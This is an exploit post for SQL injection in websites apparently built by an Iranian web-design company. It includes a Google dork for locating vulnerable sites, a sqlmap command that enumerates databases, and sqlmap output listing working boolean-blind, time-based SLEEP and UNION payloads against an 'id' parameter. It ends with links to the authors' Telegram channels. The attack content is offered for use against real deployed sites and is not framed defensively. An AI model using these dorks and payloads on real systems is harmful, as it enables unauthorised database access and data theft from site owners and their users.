#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
# Exploit Title: [sql Injection]
# Google Dork: [inurl:php?id= intext:طراحی وب سایت : ایران تکنولوژی]
# Software Link: http://sqlmap.org/
# Dork CVE: N/A
# Date: [2020-05-24]
# Exploit Author: [Aryan Chehreghani | Ictus_TM]
# Team Channel : T.me/Ictus_TM
# Version: All Version
# Tested on: [Linux / Windows / ....]
______________________________________________________________________________________
SQLMAP : [-] sqlmap -u "http://victim.com/fa/user/temp.php?pavc_njol=specific&id=87 --dbs
______________________________________________________________________________________
Testing : Generic UNION query (NULL)
MySQL >= 5.0.12 AND time-based blind (query SLEEP)
[#] Testing Method: [+] - boolean-based blind [+] - time-based blind ______________________________________________________________________________________
||||||||||||||||||||||| Parameter: sec (GET) || |||||||||||||||||||||||
EX Payload :
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: irantech_parvaz=specific&id=87' AND 4752=4752 AND 'qNzU'='qNzU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: irantech_parvaz=specific&id=87' AND (SELECT 7431 FROM (SELECT(SLEEP(5)))QoYj) AND 'irYH'='irYH
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: irantech_parvaz=specific&id=-6437' UNION ALL SELECT NULL,NULL,CONCAT(0x71716b6b71,0x4c70465956435372566e62444e59784e476a416c6951684d4375484c4754566365796f4747777a79,0x71766b7071)-- -
---
[05:49:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
____________________________________________________________________________________
[=] T.me/Clvsornapv
| Date: 2020-06-01 23:20 CET+1
| Date: 2020-06-15 15:11 CET+1
| Date: 2020-12-08 23:18 CET+1
| Date: 2021-04-27 00:29 CET+1